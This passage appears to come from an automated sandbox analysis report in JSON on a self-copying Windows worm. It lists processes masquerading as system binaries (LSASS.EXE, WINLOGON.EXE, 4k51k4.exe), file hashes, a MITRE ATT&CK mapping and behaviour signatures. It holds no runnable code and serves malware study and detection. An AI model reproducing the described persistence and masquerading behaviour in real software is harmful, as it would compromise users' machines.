"00000000-00002816", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "0514cb50277afa361e7eaefabaac863d2fe53743d008ca4da35a79bd394406a4"}, {"uid": "00000000-00003472", "parentuid": "00000000-00002816", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "ca30650fd28438184409cde0e8edf5fc9c4cf65ed23b56356a0c559d67b578c3"}, {"uid": "00000000-00000344", "parentuid": "00000000-00006060", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "ca30650fd28438184409cde0e8edf5fc9c4cf65ed23b56356a0c559d67b578c3"}, {"uid": "00000000-00005888", "parentuid": "00000000-00005064", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "7dd2bde3297dac5d447294d9b4e40a751649ebfd4df352d9bdb53953e43bf7d6"}, {"uid": "00000000-00006056", "parentuid": "00000000-00005888", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "060f13b49d833ed1e349a53d3bd85ccdf83921e82edede0000cc6f8f349f104a"}, {"uid": "00000000-00003812", "parentuid": "00000000-00005888", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "7dd2bde3297dac5d447294d9b4e40a751649ebfd4df352d9bdb53953e43bf7d6"}, {"uid": "00000000-00003980", "parentuid": "00000000-00005888", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "585aef00b14bb0951a13c2b3206f4ff05a63fd810b9cea136ebc79f62cb94d73"}, {"uid": "00000000-00004264", "parentuid": "00000000-00005888", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "c1616128bf18241bc859ee414f69c18d43f2e3da5812cd2257e0a8b59210ac6e"}, {"uid": "00000000-00004132", "parentuid": "00000000-00005888", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "8c45aca8ba6cc0a0678ea267307a3073a6fcb5c0fe5bee30c4a36a56c42d8209"}, {"uid": "00000000-00003556", "parentuid": "00000000-00005888", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "0514cb50277afa361e7eaefabaac863d2fe53743d008ca4da35a79bd394406a4"}, {"uid": "00000000-00000304", "parentuid": "00000000-00005888", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "ca30650fd28438184409cde0e8edf5fc9c4cf65ed23b56356a0c559d67b578c3"}, {"uid": "00000000-00004164", "parentuid": "00000000-00005064", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "585aef00b14bb0951a13c2b3206f4ff05a63fd810b9cea136ebc79f62cb94d73"}, {"uid": "00000000-00003688", "parentuid": "00000000-00004164", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "060f13b49d833ed1e349a53d3bd85ccdf83921e82edede0000cc6f8f349f104a"}, {"uid": "00000000-00004280", "parentuid": "00000000-00004164", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "7dd2bde3297dac5d447294d9b4e40a751649ebfd4df352d9bdb53953e43bf7d6"}, {"uid": "00000000-00003480", "parentuid": "00000000-00004164", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "585aef00b14bb0951a13c2b3206f4ff05a63fd810b9cea136ebc79f62cb94d73"}, {"uid": "00000000-00003200", "parentuid": "00000000-00004164", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "c1616128bf18241bc859ee414f69c18d43f2e3da5812cd2257e0a8b59210ac6e"}, {"uid": "00000000-00002404", "parentuid": "00000000-00004164", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "8c45aca8ba6cc0a0678ea267307a3073a6fcb5c0fe5bee30c4a36a56c42d8209"}, {"uid": "00000000-00003628", "parentuid": "00000000-00004164", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "0514cb50277afa361e7eaefabaac863d2fe53743d008ca4da35a79bd394406a4"}, {"uid": "00000000-00003576", "parentuid": "00000000-00004164", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "ca30650fd28438184409cde0e8edf5fc9c4cf65ed23b56356a0c559d67b578c3"}, {"uid": "00000000-00002532", "parentuid": "00000000-00005064", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "c1616128bf18241bc859ee414f69c18d43f2e3da5812cd2257e0a8b59210ac6e"}, {"uid": "00000000-00002832", "parentuid": "00000000-00005064", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "8c45aca8ba6cc0a0678ea267307a3073a6fcb5c0fe5bee30c4a36a56c42d8209"}, {"uid": "00000000-00000352", "parentuid": "00000000-00005064", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "0514cb50277afa361e7eaefabaac863d2fe53743d008ca4da35a79bd394406a4"}, {"uid": "00000000-00003912", "parentuid": "00000000-00005064", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "ca30650fd28438184409cde0e8edf5fc9c4cf65ed23b56356a0c559d67b578c3"}, {"uid": "00000000-00001100", "parentuid": "00000000-00003912", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "060f13b49d833ed1e349a53d3bd85ccdf83921e82edede0000cc6f8f349f104a"}, {"uid": "00000000-00004092", "parentuid": "00000000-00003912", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "7dd2bde3297dac5d447294d9b4e40a751649ebfd4df352d9bdb53953e43bf7d6"}, {"uid": "00000000-00004396", "parentuid": "00000000-00003912", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "585aef00b14bb0951a13c2b3206f4ff05a63fd810b9cea136ebc79f62cb94d73"}, {"uid": "00000000-00003600", "parentuid": "00000000-00003912", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "c1616128bf18241bc859ee414f69c18d43f2e3da5812cd2257e0a8b59210ac6e"}, {"uid": "00000000-00002236", "parentuid": "00000000-00003912", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "8c45aca8ba6cc0a0678ea267307a3073a6fcb5c0fe5bee30c4a36a56c42d8209"}, {"uid": "00000000-00002992", "parentuid": "00000000-00003912", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "0514cb50277afa361e7eaefabaac863d2fe53743d008ca4da35a79bd394406a4"}, {"uid": "00000000-00001276", "parentuid": "00000000-00003912", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "ca30650fd28438184409cde0e8edf5fc9c4cf65ed23b56356a0c559d67b578c3"}, {"uid": "00000000-00001000", "parentuid": "00000000-00005064", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "4ab2001b8debc529d2cd9caba26c45287eb818a21b01cc2bf570a2ceb119d936"}, {"uid": "00000000-00002856", "parentuid": "00000000-00001000", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "4ab2001b8debc529d2cd9caba26c45287eb818a21b01cc2bf570a2ceb119d936"}, {"uid": "00000000-00001804", "parentuid": "00000000-00001000", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "3e26b722b1d5932383dbeeb63943798112ac508b51f09e446cea3639e56671c1"}, {"uid": "00000000-00004316", "parentuid": "00000000-00001000", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "4de7cc928c793acdc5c83cc74355c8137dad9cac93b78f5d115811363e6ebfd2"}, {"uid": "00000000-00002200", "parentuid": "00000000-00001000", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "571db4ccc8951c5965bb63f7e371c954ed47fead415edff5d1653e1371cc3507"}, {"uid": "00000000-00004068", "parentuid": "00000000-00005064", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "3e26b722b1d5932383dbeeb63943798112ac508b51f09e446cea3639e56671c1"}, {"uid": "00000000-00003096", "parentuid": "00000000-00005064", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "4de7cc928c793acdc5c83cc74355c8137dad9cac93b78f5d115811363e6ebfd2"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Drive-by Compromise", "attck_id": "T1189", "attck_id_wiki": "https://attack.mitre.org/techniques/T1189", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 9}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Code Signing Policy Modification", "attck_id": "T1553.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Subvert Trust Controls", "attck_id": "T1553", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Match Legitimate Name or Location", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005", "malicious_identifiers_count": 2, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 2, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "suspicious_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 2, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Peripheral Device Discovery", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120", "malicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "suspicious_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" searching for class \"RegEdit_RegEdit\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" searching for window \"Registry Editor\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" searching for window \"Folder Options\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" searching for window \"Local Settings\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" searching for class \"ExploreWClass\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" searching for class \"CabinetWClass\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" searching for class \"RebarWindow32\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" searching for class \"ComboBoxEx32\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" searching for class \"ComboBox\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" searching for class \"Edit\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" searching for class \"#32770\"", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CopyFileA\" to copy C:\\\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe to new location %WINDIR%\\4k51k4.exe (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CopyFileA\" to copy C:\\\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe to new location C:\\4k51k4.exe (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CopyFileA\" to copy C:\\\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CopyFileA\" to copy C:\\\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe to new location %WINDIR%\\system32\\MrHelloween.scr (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CopyFileA\" to copy C:\\\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00005064)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" called \"CopyFileA\" to copy 